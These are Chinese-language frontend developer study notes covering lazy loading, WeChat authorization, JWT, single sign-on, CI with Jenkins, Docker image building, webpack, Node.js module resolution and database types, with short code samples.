是为了弥补 npm 的一些缺陷而出现的。 之前yarn解决了npm的几个痛点,比如版本锁定,慢,但又有人说5.5版本后npm改进了,但现在依然很多人说yarn的优势比较明显。 ##### **懒加载** 参考:[懒加载(知乎)](https://zhuanlan.zhihu.com/p/25455672) - offsetTop:当前元素顶端距离父元素顶端距离,鼠标滚轮不会影响其数值. - scrollTop:当前元素顶端距离窗口顶端距离,鼠标滚轮会影响其数值. 
```js function lazyload () { var images = document.getElementsByTagName( 'img' ); var len = images.length; var n = 0; // 存储图片加载到的位置,避免每次都从第一张图片开始遍历 return function () { var seeHeight = document.documentElement.clientHeight; var scrollTop = document.documentElement.scrollTop || document.body.scrollTop; for ( var i = n; i < len; i++ ) { if ( images[ i ].offsetTop < seeHeight + scrollTop ) { if ( images[ i ].getAttribute( 'src' ) === 'images/loading.gif' ) { images[ i ].src = images[ i ].getAttribute( 'data-src' ); } n = n + 1; } } } } var loadImages = lazyload(); loadImages(); //初始化首页的页面图片 // 需要节流 window.addEventListener( 'scroll', loadImages, false ); ``` ##### **预加载** 其实就等到页面加载完资源以后,再去请求接口获取图片数据,如下: ```js var images = new Array() function preload () { for ( i = 0; i & lt; preload.arguments.length; i++) { images[ i ] = new Image() images[ i ].src = preload.arguments[ i ] } } preload( "http://qiniu.cllgeek.com/react02.png", "http://qiniu.cllgeek.com/react03.png", "http://qiniu.cllgeek.com/react04.png" ) ``` ***前端优化性能清单*** 参考:[前端优化性能清单][frontEndOptimizeUrl] ***vue性能优化*** 参考:[vue性能优化][vueOptimizeUrl]、[vue3.0优化(尤大)][vue3.0OptimizeUrl] ***css性能优化*** 参考:[css性能优化的8个技巧][eightCssOptimizeUrl] #### ***IDE相关*** node.js事件循环,$nextTick的原理(如何找到dom),依赖收集过程,tab页面间通信(postmessage),diff算法具体实现过程,node.js的前端js模板(ejs,pug),数组去重,数组方法及每个作用,项目优化点,Promise实现原理(构造函数自执行),async与await #### ***微信相关*** **微信网页授权流程**: 1. 用户同意授权(两种授权方式),前端从微信服务器获取code码 2. 前端将code发送给公司后台,公司后台拿着code和服务号的appid及appSecret去微信服务器请求 3. 微信服务器给后台返回用户信息、access_token、refresh_token等。后台可以拿着access_token去调用其他接口 4. 
后台再将用户信息返回给前端。 **注意:**小程序的授权流程和上边差不多,只是微信服务器返回的是`openid,session_key,unionid`(一定条件下返回)。`session_key`是微信给公司后台颁发的身份凭证,然后公司后台就可以用它请求微信的其他的一些接口。**因此**,`session_key`不应该泄露或给小程序前端。 获取用户的openId后,公司后台就可以将一些用户信息与此绑定,并生成一个`sessionId`,然后就可以发送给前端,前端后续的请求都会携带这个`sessionId`,然后服务端就可以根据`sessionId`查询到当前登录用户的身份。还可以将`sessionId`缓存到本地,以便在还没过期的时候重复利用,以提高通信的性能。 **两种授权模式**: - 静默授权,获取用户的openid - 提示授权,获取用户的基本信息 微信网页授权是通过OAuth2.0机制实现的,在用户授权给公众号后,公众号可以获取到一个网页授权特有的接口调用凭证(网页授权access_token),通过网页授权access_token可以进行授权后接口调用,如获取用户基本信息; **微信JS-SDK**: 1. JS-SDK是javascript software development kit,即js软件开发工具包,是能够让开发者开发出应用程序的软件包,一般sdk包括一个或多个api,开发工具集合说明文档等。 2. 通过使用微信JS-SDK,网页开发者可借助微信高效地使用拍照、选图、语音、位置等手机系统的能力,同时可以直接使用微信分享、扫一扫、卡券、支付等微信特有的能力,为微信用户提供更优质的网页体验。 3. 这里前端主要用了微信分享接口, **调用过程:**: jsapi_ticket是调用微信js接口需要临时票据(当然这些工作都是后端做的) 1. 获取access_token(参考网页授权流程) 2. 公司后台拿着access_token去获取jsapi_ticket 3. 前端拿着当前页面的地址信息请求后台获取签名 4. 后台获取到前端发送的地址信息,进而生成签名返回给前端 5. 前端拿到签名,通过wx.config()接口注入权限验证配置 6. 配置通过后,调用wx.ready(function(){})执行分享操作 **微信开发者工具** 通过模拟微信客户端的表现,使得开发者可以使用这个工具方便地在pc或mac上进行开发和调试工作。 1. 可以使用自己的微信号来调试微信网页授权 2. 调试,检验页面的js-sdk相关功能与权限,模拟大部分sdk的输入与输出 3. 使用weinre的移动调试功能,支持x5 Blink内核的远程调试 4. 
利用集成的chrome DevTools协助开发 #### ***工程化*** 待整理:gps实时地图展示,流程可视化,合同模板,功能分离,常见问题解决。。。前端组件化,新兴技术如pwa,前端鉴权问题(jwt), ***前端工程化*** 参考:[前端工程化(知乎)][frontEndProjectUrl]、[我对前端工程化的理解(掘金)][howIUnderstandFrontEndProjectUrl]、[大公司里怎样开发和部署前端代码(知乎张云龙)][bigCompanyHowToDeployFrontEndCodeUrl] 几年之前,前端还是一个无足轻重的职位,日常工作无非切切图,使用jq写简单的脚本,从某种意义上,只是后端的附属物。。。但近几年,尤其Node.js出现以后,**前端的规模越来越大,已经上升到工程学的层面**,如何提高前端开发效率变得越来越重要,这就是前端工程化所要解决的问题。。。 前端工程化是使用软件工程的技术和方法来进行前端项目的开发、维护和管理。 前端工程化是根据业务特点,将前端开发流程规范化,标准化,它包括了开发流程,技术选型,代码规范,构建发布等,用于提升前端工程师的开发效率和代码质量。 前端工程化可以从模块化、组件化、规范化、自动化四个方面来思考 **1、模块化** 模块化就是将一个大文件拆分成相互依赖的小文件,再进行统一的拼装和加载,但**模块化又可以再细分为js,css,资源等** **js模块化**,在es6之前,社区有CommonJS、AMD和CMD等模块加载方案。。。到es6已经在语言层面规定了模块系统,完全可以取代之前的模块加载规范,使用起来简单同时还有**静态加载的特性**。 **css模块化**,虽然SASS、LESS、Stylus等预处理器实现了CSS的文件拆分,但没有解决CSS模块化的一个重要问题:选择器的全局污染问题。因此不同公司制定不同的CSS命名风格,但与其费尽心思地告诉别人要遵守某种规则,以规避某种痛苦,倒不如从工具层面就消灭这种痛苦。 所以从工具层面,社区又创造出Shadow DOM、CSS in JS和CSS Modules三种解决方案。 **资源模块化**,Webpack的强大之处不仅仅在于它统一了JS的各种模块系统,取代了Browserify、RequireJS、SeaJS的工作。更重要的是它的万能模块加载理念,即所有的资源都可以且也应该模块化。 资源模块化后,有三个好处: 1. 依赖关系单一化。所有CSS和图片等资源的依赖关系统一走JS路线,无需额外处理CSS预处理器的依赖关系,也不需处理代码迁移时的图片合并、字体图片等路径问题; 2. 资源处理集成化。现在可以用loader对各种资源做各种事情,比如复杂的vue-loader等等。 3. 
项目结构清晰化。使用Webpack后,你的项目结构总可以表示成这样的函数:`dest = webpack(src, config)` **2、组件化** 首先,组件化≠模块化。好多人对这两个概念有些混淆。 模块化只是在文件层面上,对代码或资源的拆分;而组件化是在设计层面上,对UI(用户界面)的拆分。从UI拆分下来的每个包含模板(HTML)+样式(CSS)+逻辑(JS)功能完备的结构单元,我们称之为组件。 **3、规范化** 模块化和组件化确定了开发模型,而这些东西的实现就需要规范去落实。比如: - 目录结构的制定 - 编码规范 - 前后端接口规范 - 文档规范 - 组件管理 - Git分支管理 - Commit描述规范 - 定期CodeReview - 视觉图标规范 **4、自动化** 持续集成、自动化构建、自动化部署、自动化测试 ***前端组件化*** 有时候我们经常将一个组件的所有资源放在一个文件夹,有的将相同的资源放在一个文件夹。。。其实前者没有做到JS模块化和资源模块化,仅仅物理位置上的模块划分是没有意义的,只会增加构建的成本而已。。。 https://juejin.im/entry/59f84b9d5188253bd85cad9b http://www.alloyteam.com/2015/11/we-will-be-componentized-web-long-text/ https://www.jianshu.com/p/b304614005d4 https://tech.meituan.com/2015/07/10/frontend-component-practice.html https://leeluolee.github.io/fequan-netease/ ***JSON Web tokens*** 参考:[跨域认证解决方案JWT(阮一峰)][crossSiteJWTUrl] 即JWT是目前最流行的跨域认证解决方案,互联网服务离不开用户认证,一般流程如下: 1. 用户向服务器发送用户名和密码 2. 服务器验证通过后,在当前对话(session)里面保存相关数据,比如用户角色,登录时间等 3. 服务器向用户返回一个session_id,写入用户的Cookie 4. 用户随后的每次请求,都会通过Cookie,将session_id传回服务器 5. 服务器收到session_id,找到之前保存的数据,由此得知用户的身份 这种模式单机还好,如果是服务器集群或跨域的服务导向架构,就要求session数据共享,每台服务器都能够读取session。。。 **注意:**session一般指服务器端,但也可以理解为服务器与客户端的会话阶段。而sessionId是服务器生成的认证凭证,客户端在cookie里保存sessionId 比如a,b网站是同一家公司的服务,现在如何实现登录了a后,b就自动登录了呢? 一种方案是session数据持久化,写入数据库或别的持久层。各种服务收到请求后都向持久层请求数据。优点是架构清晰,但工程量大,另外如果持久层挂了,就会单点失败。 另一种方案是服务器索性不保存session数据了,所有数据都保存在客户端,每次请求都将session发回服务器,JWT就是这种方案的一个代表。 **JWT的数据结构** 由三部分组成: 1. Header 描述JWT的元数据,比如注明签名算法及令牌类型 ```json { "alg": "HS256", "typ": "JWT" } ``` 2. 
Payload 用来存放实际需要传递的数据,还可以自定义字段

```json
{
  "sub": "1234567890",
  "name": "John Doe",
  "admin": true
}
```

**注意:**JWT默认是不加密的,任何人都可以读到,所以不要把秘密信息放在这个部分。SHA256只是安全散列算法,是不可逆的,也并不是什么加密算法。。。

还要知道,我们平时说的散列函数,hash算法等其实可以理解为一个意思。将任意长度的二进制值串映射为固定长度的二进制值串,这个映射的规则就是hash算法。通过原始数据映射之后得到的二进制串就是hash值。(从hash值不能反向推导出原始数据,所以也叫单向hash算法)

比如常用的md5的hash值是128位的bit长度(意味着不管处理多长的数据,返回的长度都是统一的),为了方便我们可以转为16进制编码

```js
// 可以发现即使差一个字符,结果就相差甚远
MD5(" 我今天讲哈希算法!") = 425f0d5a917188d2c3c3dc85b5e4f2cb
MD5(" 我今天讲哈希算法 ") = a1fb91ac128e6aa37fe42c663971ac3d
```

3. Signature 部分是对前两部分的签名,防止数据篡改

首先,需要指定一个密钥(secret)。这个密钥只有服务器才知道,不能泄露给用户。然后,使用 Header 里面指定的签名算法(默认是 HMAC SHA256),按照下面的公式产生签名。

```js
HMACSHA256(
  base64UrlEncode(header) + "." + base64UrlEncode(payload),
  secret)
```

算出签名后,把三部分通过.号分隔连起来,就可以返回给用户。

**注意:**Base64URL算法和Base64算法类似,但有些不同,因为**JWT作为一个令牌(token)**,有些场合可能会放到URL里,Base64 有三个字符+、/和=,在 URL 里面有特殊含义,所以要被替换掉:=被省略,+替换成-,/替换成_ 。这就是 Base64URL 算法。

**JWT的使用方式**

客户端收到服务器返回的 JWT,可以储存在 Cookie 里面,也可以储存在 localStorage。

此后,客户端每次与服务器通信,都要带上这个 JWT。**你可以把它放在 Cookie 里面自动发送,但是这样不能跨域**,所以更好的做法是放在**HTTP 请求的头信息Authorization**字段里面。

```js
Authorization: Bearer <token>
```

另一种做法是,**跨域的时候,JWT 就放在 POST 请求的数据体里面**。

**JWT的几个特点**

- JWT 默认是不加密,但也是可以加密的。生成原始 Token 以后,可以用密钥再加密一次。
- JWT 不加密的情况下,不能将秘密数据写入 JWT。
- JWT 不仅可以用于认证,也可以用于交换信息。有效使用 JWT,可以降低服务器查询数据库的次数。
- JWT 的最大缺点是,由于服务器不保存 session 状态,因此无法在使用过程中废止某个 token,或者更改 token 的权限。也就是说,一旦 JWT 签发了,在到期之前就会始终有效,除非服务器部署额外的逻辑。
- JWT 本身包含了认证信息,一旦泄露,任何人都可以获得该令牌的所有权限。为了减少盗用,JWT 的有效期应该设置得比较短。对于一些比较重要的权限,使用时应该再次对用户进行认证。
- 为了减少盗用,JWT 不应该使用 HTTP 协议明码传输,要使用 HTTPS 协议传输。

**session与token**

***单点登录***

参考:[一篇就懂单点登录(腾讯云)][onePageReadSSOUrl]

单点登录即Single Sign On,简称SSO,也就是在多个系统中,只需要登录一次,就可以访问其他相互信任的应用系统

在说单点登录的实现之前,可以再看看普通的登录认证机制(JWT原理来源)

比如一个企业一般有一个一级域名(a.com),其他系统都是二级域名,如app1.a.com,app2.a.com,再有一个单点登录系统sso.a.com。。。

通过上面的理论,我们知道,如果在sso.a.com中登录了,其实是在sso.a.com的服务端的session中记录了登录状态,同时在浏览器端(Browser)的sso.a.com下写入了Cookie。那么我们怎么才能让app1.a.com和app2.a.com登录呢?这里有两个问题:

1. 
Cookie是不能跨域的,我们Cookie的domain属性是sso.a.com,在给app1.a.com和app2.a.com发送请求是带不上的。 2. sso、app1和app2是不同的应用,它们的session存在自己的应用内,是不共享的。 针对第一个问题,我们可以在sso登录以后,将Cookie的域设置成顶域,即a.com,这样所有子域的系统都可以访问到顶域的Cookie了。如下可设置 ```js document.cookie='name=test;path=/;domain=.a.com' ``` Cookie的问题解决了,我们再来看看session的问题。我们在sso系统登录了,这时再访问app1,Cookie也带到了app1的服务端(Server),app1的服务端怎么找到这个Cookie对应的Session呢?这里就要把3个系统的Session共享,比如Spring-Session方法 **but...**但上面都不是真正的单点登录 **不同域下的单点登录** 同域下的单点登录是巧用了Cookie顶域的特性。如果是不同域呢?不同域之间Cookie是不共享的,怎么办?也就该CAS出场了。。。 具体流程如下: 1. 用户访问app系统,app系统是需要登录的,但用户现在没有登录。 2. 跳转到CAS server,即SSO登录系统,以后图中的CAS Server我们统一叫做SSO系统。 SSO系统也没有登录,弹出用户登录页。 3. 用户填写用户名、密码,SSO系统进行认证后,将登录状态写入SSO的session,浏览器(Browser)中写入SSO域下的Cookie。 4. SSO系统登录完成后会生成一个ST(Service Ticket),然后跳转到app系统,同时将ST作为参数传递给app系统。 5. app系统拿到ST后,从后台向SSO发送请求,验证ST是否有效。 6. 验证通过后,app系统将登录状态写入session并设置app域下的Cookie。 至此,跨域单点登录就完成了。以后我们再访问app系统时,app就是登录的。接下来,我们再看看访问app2系统时的流程。 1. 用户访问app2系统,app2系统没有登录,跳转到SSO。 2. 由于SSO已经登录了,不需要重新登录认证。 3. SSO生成ST,浏览器跳转到app2系统,并将ST作为参数传递给app2。 4. app2拿到ST,后台访问SSO,验证ST是否有效。 5. 验证成功后,app2将登录状态写入session,并在app2域下写入Cookie。 这样,app2系统不需要走登录流程,就已经是登录了。SSO,app和app2在不同的域,它们之间的session不共享也是没问题的。 有的人可能会问,SSO系统登录后,跳回原业务系统时,带了个参数ST,业务系统还要拿ST再次访问SSO进行验证,觉得这个步骤有点多余。他想SSO登录认证通过后,通过回调地址将用户信息返回给原业务系统,原业务系统直接设置登录状态,这样流程简单,也完成了登录,不是很好吗? 其实这样问题时很严重的,如果我在SSO没有登录,而是直接在浏览器中敲入回调的地址,并带上伪造的用户信息,是不是业务系统也认为登录了呢?这是很可怕的。 RBAC(Role-Based Access Control,基于角色的访问控制)系统。 ***Jenkins*** 在项目的早期,测试环境需要通过jenkins来部署,而线上环境需要将项目生成的dist目录发送给运维手动上线。 在说jenkins时,需要先说说持续集成,持续集成指的是,频繁的(一天多次)将代码集成到主干,它主要好处如下: 1. 快速发现错误。每完成一点更新,就集成到主干,可以快速发现错误,定位错误也比较容易 2. 防止分支大幅偏离主分支。如果不是经常集成,主干又在不断更新,会导致以后集成的难度变大,甚至难以集成 持续集成的目的,就是让产品可以快速迭代,同时还能保持高质量。持续集成不能消除bug,而是让他们非常容易发现和改正 持续集成又分持续交互和持续部署 持续交互:指的是频繁的将软件的新版本交付给代码质量团队评审。评审通过就手动部署到测试或生产环境 持续部署:指的是将评审合格的代码,自动部署到测试或生产环境。 流程: 1. 开发提交代码至仓库 2. 仓库对commit操作配置了钩子(hook),只要有新代码提交,就会触发hook 3. 然后就会触发jenkins的自动构建,也就是通过配置的脚本,拉取最新代码,安装依赖,配置各种资源,启动服务等。而这里的构建工具就是jenkins 4. 
jenkins是图形化界面配置,可以自动构建,还可以手动构建。 jenkins支持构建,部署,自动化 ***Iaas,Paas,Saas*** 越来越多的软件,开始采用云服务,但云服务只是一个统称,可以分为三大类: 1. Iaas基础设施服务(Infrastructure as a service) 2. Paas平台服务(Platform as a service) 3. Saas软件服务(Software as a service) **Saas是软件的开发、管理、部署都交给第三方,不需要关心技术问题,可以直接拿来用**。普通用户接触到的互联网服务几乎都是Saas; **Paas提供软件部署平台(runtime),抽象掉了硬件和操作系统细节,可以无缝地扩展。开发者只需要关注自己的业务逻辑,不需要关注底层**。 **Iaas是云服务的最底层,主要提供一些基础资源**,他与Paas的区别是,用户需要自己控制底层,实现基础设施的使用逻辑。 打个通俗的比方:如果你是网站站长,想建立一个网站。不采用云服务,则你需要:买服务器,安装服务器软件,编写网站程序。。。 若采用Iaas服务,则不需要购买服务器 若采用Paas服务,则不需要购买服务器,也不需要安装服务器软件 若采用Saas服务,则什么都不需要购买或安装,只需要专心负责运营即可 ***docker容器*** 软件开发的难点就是环境配置,同样的代码在不同的计算机上会表现出不同的状态。 用户必须保证两件事: 1. 操作系统的设置 2. 各种库和组件的安装 虚拟机可以解决这些问题,虚拟机相当于在一个操作系统里运行另外一个操作系统,虽可还原软件的原始环境,但有以下缺点: 1. 资源占用多(会独占部分内存和硬盘空间) 2. 冗余步骤多(一些系统级别的操作步骤,无法跳过,如用户登录) 3. 启动慢(启动操作系统比较慢) 由于虚拟机的缺点,linux发展了另外一种虚拟化技术,linux容器(linux containers 缩写LXC)。**linux容器不是模拟一个完整的操作系统,而是对进程进行隔离**。或者说,在正常进程的外面套了一个保护层。对于容器里面的进程来说,它接触到的各种资源都是虚拟的,从而实现与底层系统的隔离。 **注意:**linux系统的containers(容器)其实并不真实存在,大家常说的容器其实依托于linux的两个特性(命名空间和cgroups)而运行的正常的系统进程。 制作docker镜像?? **进程与线程:**: 1. 一个程序至少有一个进程,一个进程至少有一个线程 2. 线程的划分尺度小于进程,使得多线程程序的并发性高 3. 另外,进程在执行过程中拥有独立的内存单元,而多个线程共享内存,从而极大地提高了程序的运行效率 4. 线程在执行过程中与进程还是有区别的。每个独立的线程有一个程序运行的入口、顺序执行序列和程序的出口。但是线程不能够独立执行,必须依存在应用程序中,由应用程序提供多个线程执行控制 5. 从逻辑角度来看,多线程的意义在于一个应用程序中,有多个执行部分可以同时执行。但操作系统并没有将多个线程看做多个独立的应用,来实现进程的调度和管理以及资源分配。这就是进程和线程的重要区别 容器优势: 1. 启动快(容器里的应用,直接是底层操作系统的一个进程) 2. 资源占用少(容器只占用需要的资源,而且多个容器还可以共享资源) 3. 
体积小(容器只包含用到的组件,而虚拟机是整个操作系统的打包) 而docker属于linux容器的一种封装,提供简单易用的容器使用接口,**docker本身不是容器,而是创建容器的工具**。docker将应用程序与该程序的依赖,打包到一个文件里,运行这个文件,就会生成一个虚拟容器,应用在虚拟容器里运行,就好像在真实的物理机上运行一样。 既然是docker是linux容器的一种封装,那windows系统怎么办呢?答案是docker与windows合作推出了windows版本的docker ***docker镜像定制*** 1、FROM指定基础镜像,其实也就是在什么镜像的基础上扩展,比如 ubuntu、debian等等。当然如果不依赖任何镜像,还可以`FROM scratch`;<br/> 2、RUN执行命令,有以下两种格式: - shell 格式:RUN <命令> - exec 格式:RUN ["可执行文件", "参数1", "参数2"],这更像是函数调用中的格式。 ```js // 方式一 RUN echo '<h1>Hello, Docker!</h1>' > /usr/share/nginx/html/index.html // 方式二 CMD ["/data/nginx/sbin/nginx", "-g", "daemon off;"] ``` ```js FROM debian:stretch RUN apt-get update RUN apt-get install -y gcc libc6-dev make wget RUN wget -O redis.tar.gz "http://download.redis.io/releases/redis-5.0.3.tar.gz" RUN mkdir -p /usr/src/redis RUN tar -xzf redis.tar.gz -C /usr/src/redis --strip-components=1 RUN make -C /usr/src/redis RUN make -C /usr/src/redis install ``` Dockerfile 中每一个指令都会建立一层,RUN 也不例外。因此多次执行命令就会创建一个很多层的镜像,而有时很多运行时不需要的东西,都被装进了镜像里,比如编译环境、更新的软件包等等。结果就是产生非常臃肿、非常多层的镜像,不仅仅增加了构建部署的时间,也很容易出错。 Union FS 是有最大层数限制的,比如 AUFS,曾经是最大不得超过 42 层,现在是不得超过 127 层。 因此上面镜像的正确写法应该为: ```js FROM debian:stretch RUN set -x; buildDeps='gcc libc6-dev make wget' \ && apt-get update \ && apt-get install -y $buildDeps \ && wget -O redis.tar.gz "http://download.redis.io/releases/redis-5.0.3.tar.gz" \ && mkdir -p /usr/src/redis \ && tar -xzf redis.tar.gz -C /usr/src/redis --strip-components=1 \ && make -C /usr/src/redis \ && make -C /usr/src/redis install \ && rm -rf /var/lib/apt/lists/* \ && rm redis.tar.gz \ && rm -r /usr/src/redis \ && apt-get purge -y --auto-remove $buildDeps ``` 首先,之前所有的命令只有一个目的,就是编译、安装 redis 可执行文件。因此没有必要建立很多层,这只是一层的事情。因此,这里没有使用很多个 RUN 一一对应不同的命令,而是仅仅使用一个 RUN 指令,并使用 && 将各个所需命令串联起来。将之前的 7 层,简化为了 1 层。 此外,还可以看到这一组命令的最后添加了清理工作的命令,删除了为了编译构建所需要的软件,清理了所有下载、展开的文件,并且还清理了 apt 缓存文件。这是很重要的一步,我们之前说过,镜像是多层存储,每一层的东西并不会在下一层被删除,会一直跟随着镜像。因此镜像构建时,一定要确保每一层只添加真正需要添加的东西,任何无关的东西都应该清理掉。 构建镜像,在dockerfile文件所在目录执行: ```js $ docker build -t nginx:v3 . 
Sending build context to Docker daemon 2.048 kB
Step 1 : FROM nginx
 ---> e43d811ce2f4
Step 2 : RUN echo '<h1>Hello, Docker!</h1>' > /usr/share/nginx/html/index.html
 ---> Running in 9cdc27646c7b
 ---> 44aa4490ce2c
Removing intermediate container 9cdc27646c7b
Successfully built 44aa4490ce2c
```

从命令的输出结果中,我们可以清晰地看到镜像的构建过程。在 Step 2 中,如同我们之前所说的那样,RUN 指令启动了一个容器 9cdc27646c7b,执行了所要求的命令,并最后提交了这一层 44aa4490ce2c,随后删除了所用到的这个容器 9cdc27646c7b。

这里我们使用了 docker build 命令进行镜像构建。其格式为:`docker build [选项] <上下文路径/URL/->`

在这里我们指定了最终镜像的名称 -t nginx:v3,构建成功后,我们可以像之前运行 nginx:v2 那样来运行这个镜像,其结果会和 nginx:v2 一样。

[docker入门到实践(佳)](https://yeasy.gitbook.io/docker_practice/image/build)

***k8s(kubernetes)***

参考:[k8s与docker][k8sAndDockerUrl]、[十分钟看懂k8s与docker][tenMinuteReadDockerUrl]

在使用docker运行容器时会为每个容器创建命名空间和cgroups,所以docker和容器一一对应,容器本质上是独立的仓库,如果容器需要与外界或相互之间通信,容器就需要存储卷或将端口映射到宿主机。另外如果同时存在很多个容器的话,如何编排,管理和调度就成了问题,因此k8s就是一套基于容器的集群管理平台。

K8s集群主要包括:

1. 一个master节点(主节点,负责管理和控制)
2. 一群node节点(计算节点,工作负载节点,里面是具体的容器)

#### ***服务器相关***

***express.js与hapi.js***

1. 都是为在node(node很适合做前后端之间的中间层)环境中构建 HTTP 服务器提供方便的 API。也就是说,比单独使用较低级别的原生 http 模块更方便。http 模块可以做任何我们想做的事情,但是用它来编写应用程序是很乏味的。
2. 它们都使用了高级web框架中已有的功能:路由,插件,认证模块,处理函数等(比如:当匹配到一个页面的路由时,会有对应的处理函数进行处理)
3. express是非常小的,只是在http模块上提供一个很小的api,多数功能都可以通过额外的中间件来实现(中间件类似过滤器,在请求到达处理程序之前通过它们处理)。而hapi.js具有丰富的特性集,通常通过配置选项,而不需要编写代码。具体的差异可以对比二者的api文档
4. hapi具有请求生命周期并提供扩展点,与中间件类似,但在生命周期中存在多个已定义的点
5. 沃尔玛创建hapi并弃用express的原因之一,是因为很难将一个express应用拆分成单独的部分,让不同的团队成员安全地工作。
6. 一个插件就像一个子应用程序,你可以做任何可以在hapi.js应用程序里的操作,比如添加路由,扩展等。在一个插件系统里,你可以确定你没有破坏应用的其他部分,因为注册的顺序并不重要,你不能创建冲突的路由,你可以将这些插件组合到一个服务器中并进行部署。
7. 因为express只能提供很少的开箱即用功能,所以当你需要向项目中添加任何内容时,需要考虑外部因素。很多时候在使用hapi时,你需要的特性要么是内置的,要么是由核心团队创建的模块。
8. 极简主义虽然听起来不错,但如果你正在构建一个严谨的生产应用程序,hapi.js内置的很多东西或许是你需要的。hapi.js由沃尔玛团队设计,并主要用于支撑黑色星期五的流量,因此安全性和稳定性备受关注。也因此框架做了很多额外的事情,比如限制传入有效负载的大小,以防止耗尽进程内存。它还有一些选项,如最大事件循环延迟,最大rss内存使用和最大v8堆大小,超过这些阈值后,你的服务器将响应503超时,而不是崩溃。

nodemon(检测目录中的文件改动并自动重新启动应用程序)

1. html代码修改后,webpack不会自动编译,页面不会自动更新(需要重启服务并刷新页面)
2. 
修改js和css文件,webpack自动编译,不要重启服务,只需要刷新页面就好。 ***Webpack*** 该工具是打包工具,自动分拣js,css,html到不同的文件内,并通过生成的manifest或runtime来自动加载每个页面对应的资源文件。 - Cache-loader 默认为vue/babel/typescript编译开启,缓存在node_modules/.cache,编译出现问题时,删掉此目录 - Thread-loader 多核cpu的机器上为babel/typescript转译开启 - .browserslistrc文件 指定目标浏览器的范围 会被@babel/preset-env和postcss使用 **exclude/include路径** *与**/*意义不同, - *指resource路径下,并不包含resource子文件夹下的文件 - **/*指resource路径及其子路径下所有文件。 **package.json字段解析** [package.json字段解析(阮一峰)](http://javascript.ruanyifeng.com/nodejs/packagejson.html) [npm官方文档](https://docs.npmjs.com/files/package.json) [npm中script字段解析(官方)](https://docs.npmjs.com/misc/scripts) - main:模块的入口文件,一个包可以理解为一个模块,然后其他用户安装这个包或许就会用`require('foo')`,这时main字段就会执行字段的value值并返回结果,挂载在module.exports上 - scripts:程序生命周期内的脚本命令(有些预置命令如preinstall,postinstall,其实就是在npm install之前或之后会执行的操作) - bin:很多软件包都有一个或多个可执行文件,这些执行文件想把模块的命令安装到环境变量PATH中,从而可以直接使用包里的命令,其实可以理解为alias,alias是程序的别名,当使用别名时其实底层调用的就是程序真实的路径。然后bin字段里定义的字段,就可以直接在scripts里使用,相当于使用alias **node模块解析算法** 解析路径分为相对和非相对,相对的是以/,./或../开头,而所有其他形式都为非相对导入。。。 例如,假设有一个文件路径为 /root/src/moduleA.js,包含了一个导入var x = require("./moduleB")。Node.js的解析过程为: 1. 检查/root/src/moduleB.js文件是否存在。 2. 检查/root/src/moduleB目录是否包含一个package.json文件,且package.json文件指定了一个"main"模块。 在我们的例子里,如果Node.js发现文件 /root/src/moduleB/package.json包含了{ "main": "lib/mainModule.js" }, 3. 检查/root/src/moduleB目录是否包含一个index.js文件。 这个文件会被隐式地当作那个文件夹下的"main"模块。 假设/root/src/moduleA.js里使用的是非相对路径导入var x = require("moduleB");。 Node则会以下面的顺序去解析 moduleB,直到有一个匹配上: 1. /root/src/node_modules/moduleB.js 2. /root/src/node_modules/moduleB/package.json (如果指定了"main"属性) 3. /root/src/node_modules/moduleB/index.js 4. /root/node_modules/moduleB.js 5. /root/node_modules/moduleB/package.json (如果指定了"main"属性) 6. /root/node_modules/moduleB/index.js 7. /node_modules/moduleB.js 8. /node_modules/moduleB/package.json (如果指定了"main"属性) 9. 
/node_modules/moduleB/index.js typescript模块解析规则与node相似,只是每次检查都会检查.ts,.tsx,.d.ts后缀的文件。 ***vue-cli的原理*** 其实vue-cli是封装了一下webpack,在目前公司的脚手架就和vue没有任何关系。。。webpack本身有dev-server等(公司里用的是node+express)。。。其实可以这样理解,vue-cli调用webpack的一些接口实现一些基本配置,然后再通过命令行提示用户是否安装扩展功能,安装完以后,如果用户想再自定义配置,可以通过修改配置文件(如:vue.config.js),然后vue-cli内部会对这些配置文件进行merge处理,最终达到用户自定义配置的效果。 公司的脚手架虽然有ffe工具,但是这个工具做的工作无非是将做好的模板放在gitlab上,通过ffe工具把这些模板拉下来而已,这个模板是已经配置好了(所谓配置好了,就是各种babel,loader,plugin等都配置好了),下载完只需要安装依赖,启动服务即可。。。 ***Node.js*** Node.js 所有的异步 I/O 操作在完成时都会发送一个事件到事件队列。 Node.js所有的异步I/O操作在完成时都会发送一个事件到事件队列。Node.jss里面的许多对象都会分发事件:一个net.Server对象会在每次有新连接时触发一个事件,一个fs.readStream对象会在文件被打开时触发一个事件,所有这些产生事件的对象都是events.EventEmitter的实例 events模块只提供一个对象events.EventEmitter,EventEmitter的核心就是**事件触发与事件监听器**功能的封装 ```js var EventEmitter = require('events').EventEmitter var event = new EventEmitter() // event.on('some_event',() => { // console.log('some_event 触发了') // }) // 还可以这样 event.addListener('some_event',() => { console.log('some_event 触发了') }) setTimeout(()=>{ event.emit('some_event') },3000) // 移除事件 // event.removeListener('some_event',callback) ``` #### ***数据库相关*** 1. 关系型是指采用关系模型(二维表格模型)组织数据的数据库,具有事务一致性(任何人看到的数据都一致),也因此读写性能稍差 2. 非关系型大多开源,大多以键值对存储,且结构不固定,每一个元组可以有不一样的字段,每个元组可以根据需要增加一些自己的键值对,这样就不会局限于固定的结构,可以减少一些时间和空间的开销。 关系型数据库:Oracle、MySQL、SQLServer 非关系型数据库(NoSQL):MongoDB 注意:其实非关系性数据库NoSQL是一个门类,其下有像MongoDB这样的以键值存放的数据库。另外Mongoose是在node.js环境下对mongodb进行便捷操作的对象模型工具,Mongoose使mongodb操作更加简单快捷。 性能 - NOSQL是基于键值对的,可以想象成表中的主键和值的对应关系,而且不需要经过SQL层的解析,所以性能非常高。 - 可扩展性同样也是因为基于键值对,数据之间没有耦合性,所以非常容易水平扩展。 关系型数据库的优势: - 复杂查询可以用SQL语句方便的在一个表以及多个表之间做非常复杂的数据查询。 - 事务支持使得对于安全性能很高的数据访问要求得以实现。 1. 数据存储结构: 首先关系型数据库一般都有固定的表结构,并且需要通过DDL语句来修改表结构,不是很容易进行扩展,而非关系型数据库的存储机制就有很多了,比如基于文档的,K-V键值对的,还有基于图的等,对于数据的格式十分灵活没有固定的表结构,方便扩展,因此如果业务的数据结构并不是固定的或者经常变动比较大的,那么非关系型数据库是个好的选择 2. 
